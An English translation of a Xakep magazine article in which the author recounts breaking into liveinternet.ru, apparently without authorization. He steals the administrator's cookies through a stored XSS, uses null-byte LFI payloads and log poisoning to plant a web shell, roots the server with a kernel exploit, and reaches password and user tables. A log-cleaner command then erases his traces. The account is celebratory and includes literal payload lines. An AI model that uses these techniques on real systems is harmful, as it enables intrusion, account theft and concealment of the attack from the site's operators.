This article was published in “Xakep” #160 magazine.
Original russian version - PDF
Goodbye, Liru!
In November last year, I discovered an interesting vulnerability on one of the largest portals of the Runet — the website liveinternet.ru. It allowed for the uploading of a web shell, accessing the user database, and even obtaining root privileges on the server! This article recounts the discovery and development of this bug.
Brief Overview
First, a few words about Liveinternet.ru (also known as liru or lirushka). Many use it as a service for collecting and analyzing website visit statistics, although it’s also a huge blogging network with its own mail (based on Google Apps) and search engine. However, even major resources can have vulnerabilities like banal XSS or LFI. The decision to check the famous lirushka for vulnerabilities was spontaneous. I was curious if such a large project was protected from hacking at a simple level. So, my friend and I began manually testing this resource for XSS. After a couple of hours, our small team found two passive and two active XSS vulnerabilities. One active XSS was in private messages (sending a message to any user would execute malicious JS code in their browser). The other was in user settings (more on this below).
We then created a simple scheme to capture the admin’s cookies:
- Encrypt the sniffer code.
- Send a private message to the administrator (the admin doesn’t need to respond, just open the message).
- When the admin checks “New messages,” our malicious code executes.
- Profit!
We quickly put our plan into action (I won’t describe the XSS scheme and sniffer code here as it’s been discussed in the journal before). The next day, the admin opened our message, and we got the coveted cookies in the mail. This was where the real fun began.
Admin Panel
Inserting the obtained cookies into the browser and refreshing the page, I saw what we had worked for: extensive debug information at the bottom of each page. You can see the SQL query output while viewing private messages in the corresponding screenshot. After studying the information in detail, I wondered if it was possible to exploit the admin panel through the second active XSS in user settings in the “Search mentions” option, which allowed connecting JS files from external hosts. Here’s the content of my malicious script:
1 | <script> |
The line with “valez, valentin lyubimov, valezu, valeza, valezom” (Valentin Lyubimov aka ValeZ, the creator and head of Liveinternet.ru) was needed to hide the malicious code and show the admin the original value of the “Search mentions” field in his profile. This way, even if the admin changed the password, the cookies would still be sent to our sniffer.
Short Path to a Web Shell
After successfully creating a “bookmark” in the admin’s account, I continued exploring the resource and came across the “Applications” section. Initially, it might have been designed as an analogue of applications on VKontakte or Odnoklassniki, but it later turned into a system for sending gifts and other trinkets, which girls love. Interestingly, the applications used user data and had multiple active XSS (though this was of lesser interest to me).
After studying the applications and their interaction with the server, I found an LFI vulnerability on the domain apps.li.ru. Error output was disabled, so I had to act blindly. I first tried including a file with an extension, but it didn’t work, so I used a null byte. This helped include the well-known /etc/passwd:
1 | apps.li.ru/index.php?s=../../../../../../../etc/passwd%00 |
The vulnerability was quite banal, which surprised me. Who would have thought such a major portal could have bugs even beginners should not allow? But there was more! After succeeding with the null byte, I tried uploading via /proc/self/environ and /proc/self/cmdline, but my attempts failed. I needed to find a truly useful file, so I thought of implementing LFI through web server logs:
1 | apps.li.ru/index.php?s=../../../../../../../apache/logs/error.log%00 |
Root-Privileged Shell on li.ru
We now had a shell on the li.ru server, which was great, but we needed to go further. The output of the uname -a command showed an old kernel, which could be rooted using the well-known vmsplice exploit:
1 | Linux r06.rax.ru 2.6.21-1.3228.fc7 #1 SMP Tue Jun 12 14:56:37 EDT 2007 x86_64. |
To simplify working with root privileges, I used a modified WSO shell and within a few minutes, I could freely control the entire server via the web.
Database Configurations
Next, I found configs that revealed the root password for the MySQL database. This was a bash script for backups:
1 | /home/backup/do-backup.sh |
To be fair, the admins made it quite difficult to brute force the passwords specified in the script. The server had a lot of interesting stuff, but I decided to pause and study the database in detail. The database was quite fascinating. It was large, so I reviewed only a small part. As I mentioned, the li.ru mail is hosted on Google Apps (g.liveinternet.ru is the project’s mail service). However, all authorization occurs through li.ru, and cookies are set by the setcookie.php script on the hacked server. This allowed us to easily intercept sessions and access around 100,000 (or more) li.ru accounts without leaving the cash register. Equally interesting were the Users, liru_users, and gmail_cookies tables. I also noticed a text file in the site’s root, accessible from outside, containing very intriguing info:
1 | $_POST: Array |
As you can see, this mysterious file recorded POST requests with login and registration attempts in real time! This meant we could intercept sessions or user passwords recorded in plain text in the log without server access! Realizing the hack was complete, final, and irrevocable, I decided to clean up. Shad0S’s log cleaner helped:
1 | sh-3.2# ./log -u root -a 100.100.10.1 |
In Conclusion
Thus ended this fascinating hack of the major resource liveinterenet.ru (PR 9, TIC 43,000). We reported all bugs to the portal administrator, who quickly fixed all vulnerabilities. As you can see, even popular and authoritative projects like lirushka can have simple (and sometimes silly) bugs.
INFO
During pentesting, don’t forget the .bash_history file; it often contains a lot of useful information.
WARNING
All information is provided for educational purposes only. Neither the editor nor the authors are responsible for any harm caused by the materials of this article.